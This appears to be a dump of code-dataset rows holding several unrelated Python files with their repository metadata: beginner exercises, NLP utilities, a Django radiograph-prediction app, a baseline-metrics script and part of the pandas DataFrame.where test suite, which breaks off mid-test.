seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
40695035291 | def max_num(num1, num2, num3):
if num1 >= num2 and num1 >= num3:
return num1
elif num2 >= num1 and num2 >= num3:
return num2
else:
return num3
print(max_num(7, 4, 5))
def is_weird(n):
if n % 2 != 0:
print("Weird")
else:
if (n >= 2 and n <= 5):
print("Not Weird")
elif (n >= 6 and n <= 20):
print("Weird")
elif (n > 20):
print("Not Weird")
print(is_weird(4))
# if __name__ == '__main__':
# n = int(input().strip())
# if n % 2 != 0:
# print("Weird")
# elif n % 2 == 0 and n in range(2,5):
# print("Not weird")
# elif n % 2 == 0 and n in range(6,20):
# print("Weird")
# else:
# print("Not Weird") | tsabz/python_practice | ifStatements_comarisons.py | ifStatements_comarisons.py | py | 772 | python | en | code | 0 | github-code | 90 |
1131480921 | import requests, bs4, pandas, time
import Immobiliare, Tuttocasa
def start():
global city, title, price, par
title, price, par = [], [], []
seek = input('Enter the name of the website to scrape: ').lower()
while seek not in ['immobiliare', 'tuttocasa']:
print('\n\nYour choice is unavailable.')
seek = input('\nPlease enter the name of another website: ')
city = input('Enter the city: ')
if seek == 'immobiliare':
Immobiliare(city)
elif seek == 'tuttocasa':
Tuttocasa(city)
title, price, par = [], [], []
city = ''
start()
| Merk02/Web-Scraping | Tuttocasa.py | Tuttocasa.py | py | 593 | python | en | code | 0 | github-code | 90 |
7919852022 | import os
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score, confusion_matrix, f1_score
# task = "sentiment_analysis"
task = "risk_profiling"
direc = f"results/{task}/baseline_neutral/preds"
# direc = f"results/{task}/baseline_random/preds"
if __name__ == "__main__":
np.random.seed(42)
# train_df = pd.read_csv("../data/train.csv")
test_df = pd.read_csv(f"../data/{task}/test.csv")
# X_train = train_df
X_test = test_df
# Y_train = train_df["label"]
Y_test = test_df["label"]
# (array([0, 1, 2]), array([21, 28, 13]))
if "random" in direc:
preds = np.random.randint(low=0, high=3, size=Y_test.shape[0])
else:
preds = np.ones(Y_test.shape[0]) * 2 # neutral
if not os.path.exists(direc):
os.makedirs(direc)
with open(f"{direc}/acc.txt", "w") as f:
f.write(str(accuracy_score(Y_test, preds)))
with open(f"{direc}/f1_weighted.txt", "w") as f:
f.write(str(f1_score(Y_test, preds, average="weighted")))
with open(f"{direc}/f1_macro.txt", "w") as f:
f.write(str(f1_score(Y_test, preds, average="macro")))
with open(f"{direc}/confusion_matrix.txt", "w") as f:
f.write(str(confusion_matrix(Y_test, preds)))
| gchhablani/financial-sentiment-analysis | get_baseline.py | get_baseline.py | py | 1,250 | python | en | code | 2 | github-code | 90 |
12330760766 | import collections
from contextlib import contextmanager
import io
import re
import numpy
import chainer
from chainer.backends import cuda
def normalize_text(text):
return text.strip()
def make_vocab(dataset, max_vocab_size=20000, min_freq=2):
counts = collections.defaultdict(int)
for tokens, _ in dataset:
for token in tokens:
counts[token] += 1
vocab = {'<eos>': 0, '<unk>': 1}
for w, c in sorted(counts.items(), key=lambda x: (-x[1], x[0])):
if len(vocab) >= max_vocab_size or c < min_freq:
break
vocab[w] = len(vocab)
return vocab
def read_vocab_list(path, max_vocab_size=20000):
vocab = {'<eos>': 0, '<unk>': 1}
with io.open(path, encoding='utf-8', errors='ignore') as f:
for l in f:
w = l.strip()
if w not in vocab and w:
vocab[w] = len(vocab)
if len(vocab) >= max_vocab_size:
break
return vocab
def make_array(tokens, vocab, add_eos=True):
unk_id = vocab['<unk>']
eos_id = vocab['<eos>']
ids = [vocab.get(token, unk_id) for token in tokens]
if add_eos:
ids.append(eos_id)
return numpy.array(ids, numpy.int32)
def transform_to_array(dataset, vocab, with_label=True):
if with_label:
return [(make_array(tokens, vocab), numpy.array([cls], numpy.int32))
for tokens, cls in dataset]
else:
return [make_array(tokens, vocab)
for tokens in dataset]
def convert_seq(batch, device=None, with_label=True):
def to_device_batch(batch):
if device is None:
return batch
elif device < 0:
return [chainer.dataset.to_device(device, x) for x in batch]
else:
xp = cuda.cupy.get_array_module(*batch)
concat = xp.concatenate(batch, axis=0)
sections = numpy.cumsum([len(x)
for x in batch[:-1]], dtype=numpy.int32)
concat_dev = chainer.dataset.to_device(device, concat)
batch_dev = cuda.cupy.split(concat_dev, sections)
return batch_dev
if with_label:
ys = chainer.dataset.to_device(
device, numpy.concatenate([y for _, y in batch]))
return {'xs': to_device_batch([x for x, _ in batch]),
'ys': ys}
else:
return to_device_batch([x for x in batch])
def calc_unk_ratio(dataset, vocab):
xs = numpy.concatenate([d[0] for d in dataset])
return numpy.average(xs == vocab['<unk>'])
def load_stanfordcorenlp(uri):
from stanfordcorenlp import StanfordCoreNLP
port = None
if uri.startswith('http://'):
match = re.search(r':[0-9]+', uri)
if match is not None:
port = int(match.group(0)[1:])
uri = uri.replace(match.group(0), '')
return StanfordCoreNLP(uri, port=port)
@contextmanager
def get_tokenizer(stanfordcorenlp):
if stanfordcorenlp is None:
tokenize = lambda text: text.split()
yield tokenize
else:
with load_stanfordcorenlp(stanfordcorenlp) as nlp:
tokenize = nlp.word_tokenize
yield tokenize
| koreyou/SWEM-chainer | nlp_utils.py | nlp_utils.py | py | 3,180 | python | en | code | 0 | github-code | 90 |
43798932134 | from django.contrib import admin, messages
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.db.models import Q
import os
import environ
from django.core.paginator import Paginator
from azure.cognitiveservices.vision.customvision.prediction import CustomVisionPredictionClient
from msrest.authentication import ApiKeyCredentials
from musculoskeletal_radiograph_app.Form import CreatePatientForm, CreateRadiograph
from musculoskeletal_radiograph_app.models import Patient, Radiograph
# Create your views here.
def HomePage(request):
return render(request, "Home/welcome.html")
def GetAllPatient(request):
if request.method != "POST":
patient_obj = Patient.objects.all().order_by('-id')
p = Paginator(patient_obj, 10)
page = request.GET.get('page')
patients = p.get_page(page)
nums = "a" * patients.paginator.num_pages
return render(request, "home/getall_patient.html", { "patients" : patients, 'nums' : nums })
else:
search = request.POST['search']
if search:
patient_obj = Patient.objects.filter(Q(id__iexact = search) | Q(sur_name__iexact = search))
if patient_obj:
return render(request, "home/getall_patient.html", { "patients" : patient_obj })
else:
messages.error(request, "No result found")
return render(request, "home/getall_patient.html")
else:
return render(request, "home/getall_patient.html")
def CreatePatient(request):
if request.method != "POST":
form = CreatePatientForm()
return render(request, "home/create_patient.html", { "form":form } )
else:
form = CreatePatientForm(request.POST,request.FILES)
if form.is_valid():
first_name = form.cleaned_data["first_name"]
sur_name = form.cleaned_data["sur_name"]
phone_number = form.cleaned_data["phone_number"]
email_address = form.cleaned_data["email_address"]
if len(request.FILES) != 0:
image_url = request.FILES['image_url']
else:
image_url = None
try:
patient = Patient.objects.create(
first_name = first_name,
sur_name = sur_name,
phone_number = phone_number,
email_address = email_address,
image_url = image_url
)
messages.success(request, "Successfully Register a New Patient")
return HttpResponseRedirect(reverse("get_patient", kwargs = { "patient_id": patient.id }))
except:
messages.error(request,"Error Occur When Trying to Register New Patient")
return HttpResponseRedirect(reverse("register_patient"))
else:
form = CreatePatientForm()(request.POST, request.FILES)
return render(request, "home/create_patient.html", { "form": form })
def GetPatient(request, patient_id):
if request.method!="POST":
form = CreateRadiograph()
patient_obj = Patient.objects.get(id = patient_id)
radiograph = Paginator(Radiograph.objects.filter(patient_id = patient_obj).order_by('-id'), 6)
page = request.GET.get('page')
radiographs = radiograph.get_page(page)
nums = "a" * radiographs.paginator.num_pages
return render(request, "home/get_patient.html", { "form" : form, "patient" : patient_obj, "radiographs" : radiographs, 'nums' : nums } )
else:
form = CreateRadiograph(request.POST,request.FILES)
if form.is_valid():
try:
if len(request.FILES) != 0:
image_url = request.FILES['image_url']
else:
image_url = None
patient_obj = Patient.objects.get(id = patient_id)
# Get Configuration Settings
env = environ.Env()
environ.Env.read_env()
prediction_endpoint = env('PredictionEndpoint')
prediction_key = env('PredictionKey')
project_id = env('ProjectID')
model_name = env('ModelName')
# Authenticate a client for the training API
credentials = ApiKeyCredentials(in_headers = { "Prediction-key": prediction_key })
prediction_client = CustomVisionPredictionClient(endpoint = prediction_endpoint, credentials = credentials)
results = prediction_client.classify_image(project_id, model_name, image_url)
# Loop over each label prediction and print any with probability > 50%
for prediction in results.predictions:
if prediction.probability > 0.5:
predictions = prediction.tag_name
accuracy = prediction.probability
radiograph = Radiograph.objects.create(
patient_id = patient_obj,
image_url = image_url,
prediction = predictions,
accuracy = accuracy
)
messages.success(request,"Musculoskeletal Radiograph Predicted Successfully")
return HttpResponseRedirect(reverse("get_radiograph", kwargs = { "patient_id" : patient_id, "radiograph_id" : radiograph.id }))
except:
messages.error(request,"Failed to Predict Musculoskeletal Radiograph")
return HttpResponseRedirect(reverse("get_patient", kwargs = { "patient_id" : patient_id }))
else:
form = CreateRadiograph(request.POST, request.FILES)
return render(request, "home/get_patient.html", { "form": form })
def GetRadiograph(request, patient_id, radiograph_id):
if request.method != "POST":
patient_obj = Patient.objects.get(id = patient_id)
radiograph = Radiograph.objects.get(patient_id = patient_obj, id = radiograph_id)
return render(request, "home/get_radiograph.html", { "patient" : patient_obj, "radiograph" : radiograph } ) | olowoyinka/Abnormality_Detection_in_musculoskeletal_radiograph | musculoskeletal_radiograph_app/views.py | views.py | py | 6,272 | python | en | code | 0 | github-code | 90 |
36861290405 | """
DO NOT MODIFY
A simple worker that simulates the kind of task we run in the ETL
In chunks, it will write some text to output.txt
However, it may not be successful on every run
"""
from time import sleep
import random
import mock_db
text = 'Maestro is the best......\n\n'
def write_line(file_name, line):
"""
Function to write the provided text to the provided file in append mode
Args:
file_name: the file to which to write the text
line: text to write to the file
"""
with open(file_name, 'a') as f:
f.write(line)
def worker_main(worker_hash, db):
"""
Main routine of this worker that crashes on some probability.
Writes some text to output.txt in chunks and sleeps after each
Args:
worker_hash: a random string we will use as an id for the running worker
db: an instance of MockDB
"""
CRASH_PROBABILITY = 0.2
should_crash = random.random()
if should_crash < CRASH_PROBABILITY:
raise Exception("Crash")
CHUNK_SIZE = 5
SLEEP_DURATION = 2
cursor = 0
while cursor < len(text):
start = cursor
end = min(cursor + CHUNK_SIZE, len(text))
write_line('output.txt', text[start: end])
sleep(SLEEP_DURATION)
cursor += CHUNK_SIZE
| Jamiewu2/Interview-Handout | worker.py | worker.py | py | 1,341 | python | en | code | 1 | github-code | 90 |
1530620507 | #Python program to combine two dictionary adding values for common keys
thisDict={"brand":"Ford","Model":"Mustang","year":1964}
print(thisDict)
feature={"color":"White","Symbol":"Horse","year":1964}
print(feature)
thisDict["year"]=1984
feature["year"]=1984
newDict={}
for i in (thisDict,feature):
newDict.update(i)
print("The combination of two Dictionary is ",newDict)
| ManiNTR/python | CombineDictionaryCommonKey.py | CombineDictionaryCommonKey.py | py | 385 | python | en | code | 0 | github-code | 90 |
18523455499 | import itertools
x,y = map(int,input().split())
ab = []
for _ in range(x):
a, b, c = (int(x) for x in input().split())
ab.append([a, b, c])
ans = -1000000000000000000000
for i in itertools.product([1,-1], repeat=3):
memo = []
ansl = 0
for j in ab:
p = j[0]*i[0]+j[1]*i[1]+j[2]*i[2]
memo.append(p)
memo.sort(reverse=True)
for k in range(y):
ansl += memo[k]
ans = max(ans, ansl)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03326/s035482367.py | s035482367.py | py | 446 | python | en | code | 0 | github-code | 90 |
34871163690 | from datetime import datetime
from hypothesis import given
import numpy as np
import pytest
from pandas.core.dtypes.common import is_scalar
import pandas as pd
from pandas import (
DataFrame,
DatetimeIndex,
Index,
Series,
StringDtype,
Timestamp,
date_range,
isna,
)
import pandas._testing as tm
from pandas._testing._hypothesis import OPTIONAL_ONE_OF_ALL
@pytest.fixture(params=["default", "float_string", "mixed_float", "mixed_int"])
def where_frame(request, float_string_frame, mixed_float_frame, mixed_int_frame):
if request.param == "default":
return DataFrame(
np.random.default_rng(2).standard_normal((5, 3)), columns=["A", "B", "C"]
)
if request.param == "float_string":
return float_string_frame
if request.param == "mixed_float":
return mixed_float_frame
if request.param == "mixed_int":
return mixed_int_frame
def _safe_add(df):
# only add to the numeric items
def is_ok(s):
return (
issubclass(s.dtype.type, (np.integer, np.floating)) and s.dtype != "uint8"
)
return DataFrame(dict((c, s + 1) if is_ok(s) else (c, s) for c, s in df.items()))
class TestDataFrameIndexingWhere:
def test_where_get(self, where_frame, float_string_frame):
def _check_get(df, cond, check_dtypes=True):
other1 = _safe_add(df)
rs = df.where(cond, other1)
rs2 = df.where(cond.values, other1)
for k, v in rs.items():
exp = Series(np.where(cond[k], df[k], other1[k]), index=v.index)
tm.assert_series_equal(v, exp, check_names=False)
tm.assert_frame_equal(rs, rs2)
# dtypes
if check_dtypes:
assert (rs.dtypes == df.dtypes).all()
# check getting
df = where_frame
if df is float_string_frame:
msg = "'>' not supported between instances of 'str' and 'int'"
with pytest.raises(TypeError, match=msg):
df > 0
return
cond = df > 0
_check_get(df, cond)
def test_where_upcasting(self):
# upcasting case (GH # 2794)
df = DataFrame(
{
c: Series([1] * 3, dtype=c)
for c in ["float32", "float64", "int32", "int64"]
}
)
df.iloc[1, :] = 0
result = df.dtypes
expected = Series(
[
np.dtype("float32"),
np.dtype("float64"),
np.dtype("int32"),
np.dtype("int64"),
],
index=["float32", "float64", "int32", "int64"],
)
# when we don't preserve boolean casts
#
# expected = Series({ 'float32' : 1, 'float64' : 3 })
tm.assert_series_equal(result, expected)
@pytest.mark.filterwarnings("ignore:Downcasting object dtype arrays:FutureWarning")
def test_where_alignment(self, where_frame, float_string_frame):
# aligning
def _check_align(df, cond, other, check_dtypes=True):
rs = df.where(cond, other)
for i, k in enumerate(rs.columns):
result = rs[k]
d = df[k].values
c = cond[k].reindex(df[k].index).fillna(False).values
if is_scalar(other):
o = other
elif isinstance(other, np.ndarray):
o = Series(other[:, i], index=result.index).values
else:
o = other[k].values
new_values = d if c.all() else np.where(c, d, o)
expected = Series(new_values, index=result.index, name=k)
# since we can't always have the correct numpy dtype
# as numpy doesn't know how to downcast, don't check
tm.assert_series_equal(result, expected, check_dtype=False)
# dtypes
# can't check dtype when other is an ndarray
if check_dtypes and not isinstance(other, np.ndarray):
assert (rs.dtypes == df.dtypes).all()
df = where_frame
if df is float_string_frame:
msg = "'>' not supported between instances of 'str' and 'int'"
with pytest.raises(TypeError, match=msg):
df > 0
return
# other is a frame
cond = (df > 0)[1:]
_check_align(df, cond, _safe_add(df))
# check other is ndarray
cond = df > 0
_check_align(df, cond, (_safe_add(df).values))
# integers are upcast, so don't check the dtypes
cond = df > 0
check_dtypes = all(not issubclass(s.type, np.integer) for s in df.dtypes)
_check_align(df, cond, np.nan, check_dtypes=check_dtypes)
# Ignore deprecation warning in Python 3.12 for inverting a bool
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_where_invalid(self):
# invalid conditions
df = DataFrame(
np.random.default_rng(2).standard_normal((5, 3)), columns=["A", "B", "C"]
)
cond = df > 0
err1 = (df + 1).values[0:2, :]
msg = "other must be the same shape as self when an ndarray"
with pytest.raises(ValueError, match=msg):
df.where(cond, err1)
err2 = cond.iloc[:2, :].values
other1 = _safe_add(df)
msg = "Array conditional must be same shape as self"
with pytest.raises(ValueError, match=msg):
df.where(err2, other1)
with pytest.raises(ValueError, match=msg):
df.mask(True)
with pytest.raises(ValueError, match=msg):
df.mask(0)
@pytest.mark.filterwarnings("ignore:Downcasting object dtype arrays:FutureWarning")
def test_where_set(self, where_frame, float_string_frame, mixed_int_frame):
# where inplace
def _check_set(df, cond, check_dtypes=True):
dfi = df.copy()
econd = cond.reindex_like(df).fillna(True).infer_objects(copy=False)
expected = dfi.mask(~econd)
return_value = dfi.where(cond, np.nan, inplace=True)
assert return_value is None
tm.assert_frame_equal(dfi, expected)
# dtypes (and confirm upcasts)x
if check_dtypes:
for k, v in df.dtypes.items():
if issubclass(v.type, np.integer) and not cond[k].all():
v = np.dtype("float64")
assert dfi[k].dtype == v
df = where_frame
if df is float_string_frame:
msg = "'>' not supported between instances of 'str' and 'int'"
with pytest.raises(TypeError, match=msg):
df > 0
return
if df is mixed_int_frame:
df = df.astype("float64")
cond = df > 0
_check_set(df, cond)
cond = df >= 0
_check_set(df, cond)
# aligning
cond = (df >= 0)[1:]
_check_set(df, cond)
def test_where_series_slicing(self):
# GH 10218
# test DataFrame.where with Series slicing
df = DataFrame({"a": range(3), "b": range(4, 7)})
result = df.where(df["a"] == 1)
expected = df[df["a"] == 1].reindex(df.index)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("klass", [list, tuple, np.array])
def test_where_array_like(self, klass):
# see gh-15414
df = DataFrame({"a": [1, 2, 3]})
cond = [[False], [True], [True]]
expected = DataFrame({"a": [np.nan, 2, 3]})
result = df.where(klass(cond))
tm.assert_frame_equal(result, expected)
df["b"] = 2
expected["b"] = [2, np.nan, 2]
cond = [[False, True], [True, False], [True, True]]
result = df.where(klass(cond))
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"cond",
[
[[1], [0], [1]],
Series([[2], [5], [7]]),
DataFrame({"a": [2, 5, 7]}),
[["True"], ["False"], ["True"]],
[[Timestamp("2017-01-01")], [pd.NaT], [Timestamp("2017-01-02")]],
],
)
def test_where_invalid_input_single(self, cond):
# see gh-15414: only boolean arrays accepted
df = DataFrame({"a": [1, 2, 3]})
msg = "Boolean array expected for the condition"
with pytest.raises(ValueError, match=msg):
df.where(cond)
@pytest.mark.parametrize(
"cond",
[
[[0, 1], [1, 0], [1, 1]],
Series([[0, 2], [5, 0], [4, 7]]),
[["False", "True"], ["True", "False"], ["True", "True"]],
DataFrame({"a": [2, 5, 7], "b": [4, 8, 9]}),
[
[pd.NaT, Timestamp("2017-01-01")],
[Timestamp("2017-01-02"), pd.NaT],
[Timestamp("2017-01-03"), Timestamp("2017-01-03")],
],
],
)
def test_where_invalid_input_multiple(self, cond):
# see gh-15414: only boolean arrays accepted
df = DataFrame({"a": [1, 2, 3], "b": [2, 2, 2]})
msg = "Boolean array expected for the condition"
with pytest.raises(ValueError, match=msg):
df.where(cond)
def test_where_dataframe_col_match(self):
df = DataFrame([[1, 2, 3], [4, 5, 6]])
cond = DataFrame([[True, False, True], [False, False, True]])
result = df.where(cond)
expected = DataFrame([[1.0, np.nan, 3], [np.nan, np.nan, 6]])
tm.assert_frame_equal(result, expected)
# this *does* align, though has no matching columns
cond.columns = ["a", "b", "c"]
result = df.where(cond)
expected = DataFrame(np.nan, index=df.index, columns=df.columns)
tm.assert_frame_equal(result, expected)
def test_where_ndframe_align(self):
msg = "Array conditional must be same shape as self"
df = DataFrame([[1, 2, 3], [4, 5, 6]])
cond = [True]
with pytest.raises(ValueError, match=msg):
df.where(cond)
expected = DataFrame([[1, 2, 3], [np.nan, np.nan, np.nan]])
out = df.where(Series(cond))
tm.assert_frame_equal(out, expected)
cond = np.array([False, True, False, True])
with pytest.raises(ValueError, match=msg):
df.where(cond)
expected = DataFrame([[np.nan, np.nan, np.nan], [4, 5, 6]])
out = df.where(Series(cond))
tm.assert_frame_equal(out, expected)
def test_where_bug(self):
# see gh-2793
df = DataFrame(
{"a": [1.0, 2.0, 3.0, 4.0], "b": [4.0, 3.0, 2.0, 1.0]}, dtype="float64"
)
expected = DataFrame(
{"a": [np.nan, np.nan, 3.0, 4.0], "b": [4.0, 3.0, np.nan, np.nan]},
dtype="float64",
)
result = df.where(df > 2, np.nan)
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(result > 2, np.nan, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_bug_mixed(self, any_signed_int_numpy_dtype):
# see gh-2793
df = DataFrame(
{
"a": np.array([1, 2, 3, 4], dtype=any_signed_int_numpy_dtype),
"b": np.array([4.0, 3.0, 2.0, 1.0], dtype="float64"),
}
)
expected = DataFrame(
{"a": [-1, -1, 3, 4], "b": [4.0, 3.0, -1, -1]},
).astype({"a": any_signed_int_numpy_dtype, "b": "float64"})
result = df.where(df > 2, -1)
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(result > 2, -1, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_bug_transposition(self):
# see gh-7506
a = DataFrame({0: [1, 2], 1: [3, 4], 2: [5, 6]})
b = DataFrame({0: [np.nan, 8], 1: [9, np.nan], 2: [np.nan, np.nan]})
do_not_replace = b.isna() | (a > b)
expected = a.copy()
expected[~do_not_replace] = b
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
result = a.where(do_not_replace, b)
tm.assert_frame_equal(result, expected)
a = DataFrame({0: [4, 6], 1: [1, 0]})
b = DataFrame({0: [np.nan, 3], 1: [3, np.nan]})
do_not_replace = b.isna() | (a > b)
expected = a.copy()
expected[~do_not_replace] = b
with tm.assert_produces_warning(FutureWarning, match=msg):
result = a.where(do_not_replace, b)
tm.assert_frame_equal(result, expected)
def test_where_datetime(self):
# GH 3311
df = DataFrame(
{
"A": date_range("20130102", periods=5),
"B": date_range("20130104", periods=5),
"C": np.random.default_rng(2).standard_normal(5),
}
)
stamp = datetime(2013, 1, 3)
msg = "'>' not supported between instances of 'float' and 'datetime.datetime'"
with pytest.raises(TypeError, match=msg):
df > stamp
result = df[df.iloc[:, :-1] > stamp]
expected = df.copy()
expected.loc[[0, 1], "A"] = np.nan
expected.loc[:, "C"] = np.nan
tm.assert_frame_equal(result, expected)
def test_where_none(self):
# GH 4667
# setting with None changes dtype
df = DataFrame({"series": Series(range(10))}).astype(float)
df[df > 7] = None
expected = DataFrame(
{"series": Series([0, 1, 2, 3, 4, 5, 6, 7, np.nan, np.nan])}
)
tm.assert_frame_equal(df, expected)
# GH 7656
df = DataFrame(
[
{"A": 1, "B": np.nan, "C": "Test"},
{"A": np.nan, "B": "Test", "C": np.nan},
]
)
orig = df.copy()
mask = ~isna(df)
df.where(mask, None, inplace=True)
expected = DataFrame(
{
"A": [1.0, np.nan],
"B": [None, "Test"],
"C": ["Test", None],
}
)
tm.assert_frame_equal(df, expected)
df = orig.copy()
df[~mask] = None
tm.assert_frame_equal(df, expected)
def test_where_empty_df_and_empty_cond_having_non_bool_dtypes(self):
# see gh-21947
df = DataFrame(columns=["a"])
cond = df
assert (cond.dtypes == object).all()
result = df.where(cond)
tm.assert_frame_equal(result, df)
def test_where_align(self):
def create():
df = DataFrame(np.random.default_rng(2).standard_normal((10, 3)))
df.iloc[3:5, 0] = np.nan
df.iloc[4:6, 1] = np.nan
df.iloc[5:8, 2] = np.nan
return df
# series
df = create()
expected = df.fillna(df.mean())
result = df.where(pd.notna(df), df.mean(), axis="columns")
tm.assert_frame_equal(result, expected)
return_value = df.where(pd.notna(df), df.mean(), inplace=True, axis="columns")
assert return_value is None
tm.assert_frame_equal(df, expected)
df = create().fillna(0)
expected = df.apply(lambda x, y: x.where(x > 0, y), y=df[0])
result = df.where(df > 0, df[0], axis="index")
tm.assert_frame_equal(result, expected)
result = df.where(df > 0, df[0], axis="rows")
tm.assert_frame_equal(result, expected)
# frame
df = create()
expected = df.fillna(1)
result = df.where(
pd.notna(df), DataFrame(1, index=df.index, columns=df.columns)
)
tm.assert_frame_equal(result, expected)
def test_where_complex(self):
# GH 6345
expected = DataFrame([[1 + 1j, 2], [np.nan, 4 + 1j]], columns=["a", "b"])
df = DataFrame([[1 + 1j, 2], [5 + 1j, 4 + 1j]], columns=["a", "b"])
df[df.abs() >= 5] = np.nan
tm.assert_frame_equal(df, expected)
def test_where_axis(self):
# GH 9736
df = DataFrame(np.random.default_rng(2).standard_normal((2, 2)))
mask = DataFrame([[False, False], [False, False]])
ser = Series([0, 1])
expected = DataFrame([[0, 0], [1, 1]], dtype="float64")
result = df.where(mask, ser, axis="index")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, ser, axis="index", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
expected = DataFrame([[0, 1], [0, 1]], dtype="float64")
result = df.where(mask, ser, axis="columns")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, ser, axis="columns", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_axis_with_upcast(self):
# Upcast needed
df = DataFrame([[1, 2], [3, 4]], dtype="int64")
mask = DataFrame([[False, False], [False, False]])
ser = Series([0, np.nan])
expected = DataFrame([[0, 0], [np.nan, np.nan]], dtype="float64")
result = df.where(mask, ser, axis="index")
tm.assert_frame_equal(result, expected)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, ser, axis="index", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
expected = DataFrame([[0, np.nan], [0, np.nan]])
result = df.where(mask, ser, axis="columns")
tm.assert_frame_equal(result, expected)
expected = DataFrame(
{
0: np.array([0, 0], dtype="int64"),
1: np.array([np.nan, np.nan], dtype="float64"),
}
)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, ser, axis="columns", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_axis_multiple_dtypes(self):
# Multiple dtypes (=> multiple Blocks)
df = pd.concat(
[
DataFrame(np.random.default_rng(2).standard_normal((10, 2))),
DataFrame(
np.random.default_rng(2).integers(0, 10, size=(10, 2)),
dtype="int64",
),
],
ignore_index=True,
axis=1,
)
mask = DataFrame(False, columns=df.columns, index=df.index)
s1 = Series(1, index=df.columns)
s2 = Series(2, index=df.index)
result = df.where(mask, s1, axis="columns")
expected = DataFrame(1.0, columns=df.columns, index=df.index)
expected[2] = expected[2].astype("int64")
expected[3] = expected[3].astype("int64")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, s1, axis="columns", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
result = df.where(mask, s2, axis="index")
expected = DataFrame(2.0, columns=df.columns, index=df.index)
expected[2] = expected[2].astype("int64")
expected[3] = expected[3].astype("int64")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, s2, axis="index", inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
# DataFrame vs DataFrame
d1 = df.copy().drop(1, axis=0)
# Explicit cast to avoid implicit cast when setting value to np.nan
expected = df.copy().astype("float")
expected.loc[1, :] = np.nan
result = df.where(mask, d1)
tm.assert_frame_equal(result, expected)
result = df.where(mask, d1, axis="index")
tm.assert_frame_equal(result, expected)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, d1, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
result = df.copy()
with tm.assert_produces_warning(FutureWarning, match="incompatible dtype"):
return_value = result.where(mask, d1, inplace=True, axis="index")
assert return_value is None
tm.assert_frame_equal(result, expected)
d2 = df.copy().drop(1, axis=1)
expected = df.copy()
expected.loc[:, 1] = np.nan
result = df.where(mask, d2)
tm.assert_frame_equal(result, expected)
result = df.where(mask, d2, axis="columns")
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, d2, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(mask, d2, inplace=True, axis="columns")
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_callable(self):
# GH 12533
df = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
result = df.where(lambda x: x > 4, lambda x: x + 1)
exp = DataFrame([[2, 3, 4], [5, 5, 6], [7, 8, 9]])
tm.assert_frame_equal(result, exp)
tm.assert_frame_equal(result, df.where(df > 4, df + 1))
# return ndarray and scalar
result = df.where(lambda x: (x % 2 == 0).values, lambda x: 99)
exp = DataFrame([[99, 2, 99], [4, 99, 6], [99, 8, 99]])
tm.assert_frame_equal(result, exp)
tm.assert_frame_equal(result, df.where(df % 2 == 0, 99))
# chain
result = (df + 2).where(lambda x: x > 8, lambda x: x + 10)
exp = DataFrame([[13, 14, 15], [16, 17, 18], [9, 10, 11]])
tm.assert_frame_equal(result, exp)
tm.assert_frame_equal(result, (df + 2).where((df + 2) > 8, (df + 2) + 10))
def test_where_tz_values(self, tz_naive_fixture, frame_or_series):
obj1 = DataFrame(
DatetimeIndex(["20150101", "20150102", "20150103"], tz=tz_naive_fixture),
columns=["date"],
)
obj2 = DataFrame(
DatetimeIndex(["20150103", "20150104", "20150105"], tz=tz_naive_fixture),
columns=["date"],
)
mask = DataFrame([True, True, False], columns=["date"])
exp = DataFrame(
DatetimeIndex(["20150101", "20150102", "20150105"], tz=tz_naive_fixture),
columns=["date"],
)
if frame_or_series is Series:
obj1 = obj1["date"]
obj2 = obj2["date"]
mask = mask["date"]
exp = exp["date"]
result = obj1.where(mask, obj2)
tm.assert_equal(exp, result)
def test_df_where_change_dtype(self):
# GH#16979
df = DataFrame(np.arange(2 * 3).reshape(2, 3), columns=list("ABC"))
mask = np.array([[True, False, False], [False, False, True]])
result = df.where(mask)
expected = DataFrame(
[[0, np.nan, np.nan], [np.nan, np.nan, 5]], columns=list("ABC")
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{}, {"other": None}])
def test_df_where_with_category(self, kwargs):
# GH#16979
data = np.arange(2 * 3, dtype=np.int64).reshape(2, 3)
df = DataFrame(data, columns=list("ABC"))
mask = np.array([[True, False, False], [False, False, True]])
# change type to category
df.A = df.A.astype("category")
df.B = df.B.astype("category")
df.C = df.C.astype("category")
